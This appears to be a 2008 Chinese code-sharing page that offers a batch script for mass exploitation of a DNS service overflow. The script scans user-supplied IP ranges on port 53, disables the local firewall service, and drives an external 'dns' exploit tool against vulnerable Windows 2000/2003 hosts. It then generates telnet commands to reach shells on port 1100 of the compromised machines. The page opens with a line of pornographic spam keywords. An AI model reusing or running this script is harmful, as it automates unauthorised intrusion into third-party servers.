欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

DNS批量溢出批處理代碼

 更新時(shí)間:2008年05月05日 23:04:09   作者:  
用批處理實(shí)現(xiàn)dns的批量溢出代碼

復(fù)制代碼 代碼如下:

@shift 1 
@ setlocal 
@ cls 
@ color A 
@ title DNS批量溢出個(gè)人版 
@echo ================================================================================ 
@echo DNS批量溢出個(gè)人版 
@echo BY Amxking 
@echo 1.輸入您想溢出的IP段 格式:XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX  
@echo================================================================================= 
@ set /p input=1.輸入您想溢出的IP段: 
@ echo %input%>>ip.txt 
@ net stop sharedaccess 
@ net start server 
@echo ================================================================================ 
@set /p c=請(qǐng)選擇掃描方式: (1為TCP,2為syn): 
@if "%c%"=="2" goto syn 
@if "%c%"=="1" goto tcp 

:syn 
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%\s syn %%i %%j 53 /save 
@ goto ip 

:tcp 
@for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do %MYFILES%\s tcp %%i %%j 53 1000 /save 

@ goto ip 

:ip 
@for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt 
@for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt 
@for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt 

@del ip.txt 
@del s1.txt 
@del s2.txt 
@del Result.txt 
@echo================================================================================= 
@echo 等待溢出…………當(dāng)出現(xiàn)類似203.80.19.6 1077 :Vulnerability OS:window 2003 
@echo 為可以溢出的IP 203.80.19.6 為IP 1077為端口 2003 為系統(tǒng)類型 
@echo 請(qǐng)把能溢出的保存為boot.txt 保存格式:IP 端口 系統(tǒng) 例如 58.34.125.200 1029 2003 
@echo================================================================================= 
@ FOR /F "eol= tokens=1 delims= " %%i in (s.txt) do %MYFILES%\dns -s %%i >>a.txt 
@echo================================================================================= 
@echo 請(qǐng)把能溢出的保存為boot.txt 保存格式:IP 端口 系統(tǒng) 例如 58.34.125.200 1029 2003 
@echo================================================================================= 
@pause 

@ for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%\dns -t2000all %%i %%j 

@for /F "eol= tokens=1,2 delims= " %%i in (boot.txt) do %MYFILES%\dns -t2003eng %%i %%j 
@goto yichu 
:yichu 
@for /F "eol=s tokens=1 delims= " %%i in (boot.txt) do echo telnet %%i 1100>>3.txt 
@for /F "eol= tokens=1 delims=" %%i in (3.txt) do echo %%i>>%%i.bat 
@del s.txt 
@del a.txt 
@del 3.txt 

@echo================================================================================= 
@echo 運(yùn)行生成的批處理 等待溢出………… 
@echo================================================================================= 
@pause

相關(guān)文章

最新評(píng)論